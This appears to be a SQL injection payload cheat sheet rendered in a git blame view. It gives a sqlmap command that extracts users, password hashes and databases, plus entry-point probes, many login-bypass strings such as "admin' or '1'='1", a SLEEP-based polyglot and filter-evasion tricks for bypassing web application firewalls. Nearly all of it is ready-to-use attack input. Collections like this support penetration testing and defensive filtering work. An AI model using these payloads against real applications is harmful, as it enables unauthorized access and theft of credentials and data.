2016-10-18 06:39:17 +00:00
|
|
|
# SQL injection
|
|
|
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
2016-10-18 08:01:56 +00:00
|
|
|
|
2016-11-29 16:27:35 +00:00
|
|
|
## SQL injection using SQLmap
|
|
|
|
```
|
|
|
|
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
|
|
|
```
|
2016-10-18 08:01:56 +00:00
|
|
|
|
2016-11-29 16:27:35 +00:00
|
|
|
## Entry point detection
|
2016-10-18 06:39:17 +00:00
|
|
|
Detection of an SQL injection entry point
|
2016-10-18 08:01:56 +00:00
|
|
|
```
|
2016-10-18 06:39:17 +00:00
|
|
|
'
|
|
|
|
"
|
|
|
|
%27
|
|
|
|
" / %22
|
|
|
|
; / %3B
|
|
|
|
%%2727
|
|
|
|
%25%27
|
|
|
|
`+HERP
|
|
|
|
'||'DERP
|
|
|
|
'+'herp
|
|
|
|
' ' DERP
|
|
|
|
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
|
|
|
transformed into U+0022 QUOTATION MARK (")
|
|
|
|
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
|
|
|
transformed into U+0027 APOSTROPHE (')
|
|
|
|
```
|
|
|
|
|
2016-11-29 16:27:35 +00:00
|
|
|
## Authentication bypass
|
|
|
|
```
|
|
|
|
'-'
|
|
|
|
' '
|
|
|
|
'&'
|
|
|
|
'^'
|
|
|
|
'*'
|
|
|
|
' or ''-'
|
|
|
|
' or '' '
|
|
|
|
' or ''&'
|
|
|
|
' or ''^'
|
|
|
|
' or ''*'
|
|
|
|
"-"
|
|
|
|
" "
|
|
|
|
"&"
|
|
|
|
"^"
|
|
|
|
"*"
|
|
|
|
" or ""-"
|
|
|
|
" or "" "
|
|
|
|
" or ""&"
|
|
|
|
" or ""^"
|
|
|
|
" or ""*"
|
|
|
|
or true--
|
|
|
|
" or true--
|
|
|
|
' or true--
|
|
|
|
") or true--
|
|
|
|
') or true--
|
|
|
|
' or 'x'='x
|
|
|
|
') or ('x')=('x
|
|
|
|
')) or (('x'))=(('x
|
|
|
|
" or "x"="x
|
|
|
|
") or ("x")=("x
|
|
|
|
")) or (("x"))=(("x
|
|
|
|
or 1=1
|
|
|
|
or 1=1--
|
|
|
|
or 1=1#
|
|
|
|
or 1=1/*
|
|
|
|
admin' --
|
|
|
|
admin' #
|
|
|
|
admin'/*
|
|
|
|
admin' or '1'='1
|
|
|
|
admin' or '1'='1'--
|
|
|
|
admin' or '1'='1'#
|
|
|
|
admin' or '1'='1'/*
|
|
|
|
admin'or 1=1 or ''='
|
|
|
|
admin' or 1=1
|
|
|
|
admin' or 1=1--
|
|
|
|
admin' or 1=1#
|
|
|
|
admin' or 1=1/*
|
|
|
|
admin') or ('1'='1
|
|
|
|
admin') or ('1'='1'--
|
|
|
|
admin') or ('1'='1'#
|
|
|
|
admin') or ('1'='1'/*
|
|
|
|
admin') or '1'='1
|
|
|
|
admin') or '1'='1'--
|
|
|
|
admin') or '1'='1'#
|
|
|
|
admin') or '1'='1'/*
|
|
|
|
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
|
|
admin" --
|
|
|
|
admin" #
|
|
|
|
admin"/*
|
|
|
|
admin" or "1"="1
|
|
|
|
admin" or "1"="1"--
|
|
|
|
admin" or "1"="1"#
|
|
|
|
admin" or "1"="1"/*
|
|
|
|
admin"or 1=1 or ""="
|
|
|
|
admin" or 1=1
|
|
|
|
admin" or 1=1--
|
|
|
|
admin" or 1=1#
|
|
|
|
admin" or 1=1/*
|
|
|
|
admin") or ("1"="1
|
|
|
|
admin") or ("1"="1"--
|
|
|
|
admin") or ("1"="1"#
|
|
|
|
admin") or ("1"="1"/*
|
|
|
|
admin") or "1"="1
|
|
|
|
admin") or "1"="1"--
|
|
|
|
admin") or "1"="1"#
|
|
|
|
admin") or "1"="1"/*
|
|
|
|
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
|
|
```
|
|
|
|
|
|
|
|
## Polyglot injection (multicontext)
|
2016-10-18 06:39:17 +00:00
|
|
|
```
|
|
|
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
2016-10-18 08:01:56 +00:00
|
|
|
```
|
|
|
|
|
2016-12-03 18:03:59 +00:00
|
|
|
## WAF Bypass
|
|
|
|
|
|
|
|
No Whitespace - bypass using comments
|
|
|
|
```
|
|
|
|
?id=1/*comment*/and/**/1=1/**/--
|
|
|
|
```
|
|
|
|
|
|
|
|
No Whitespace - bypass using parenthesis
|
|
|
|
```
|
|
|
|
?id=(1)and(1)=(1)--
|
|
|
|
```
|
|
|
|
|
|
|
|
No Comma - bypass using OFFSET and FROM
|
|
|
|
```
|
|
|
|
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
|
|
|
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
|
|
|
```
|
|
|
|
|
|
|
|
Blacklist using keywords - bypass using uppercase/lowercase
|
|
|
|
```
|
|
|
|
?id=1 AND 1=1#
|
|
|
|
?id=1 AnD 1=1#
|
|
|
|
?id=1 aNd 1=1#
|
|
|
|
```
|
|
|
|
|
|
|
|
Blacklist using keywords case insensitive - bypass using equivalent
|
|
|
|
```
|
|
|
|
AND -> &&
|
|
|
|
OR -> ||
|
|
|
|
= -> LIKE,REGEXP, not < and not >
|
|
|
|
WHERE -> HAVING
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2016-11-06 05:42:50 +00:00
|
|
|
## Thanks to - Other resources
|
|
|
|
* MySQL:
|
|
|
|
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
|
|
|
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
|
|
|
* MSQQL:
|
|
|
|
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
|
|
|
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
|
|
|
* ORACLE:
|
|
|
|
- [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
|
|
|
|
* POSTGRESQL:
|
|
|
|
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
|
|
|
* Others
|
|
|
|
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
|
|
|
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
|
|
|
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
|
|
|
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
|
|
|
|
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
|
|
|
|
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|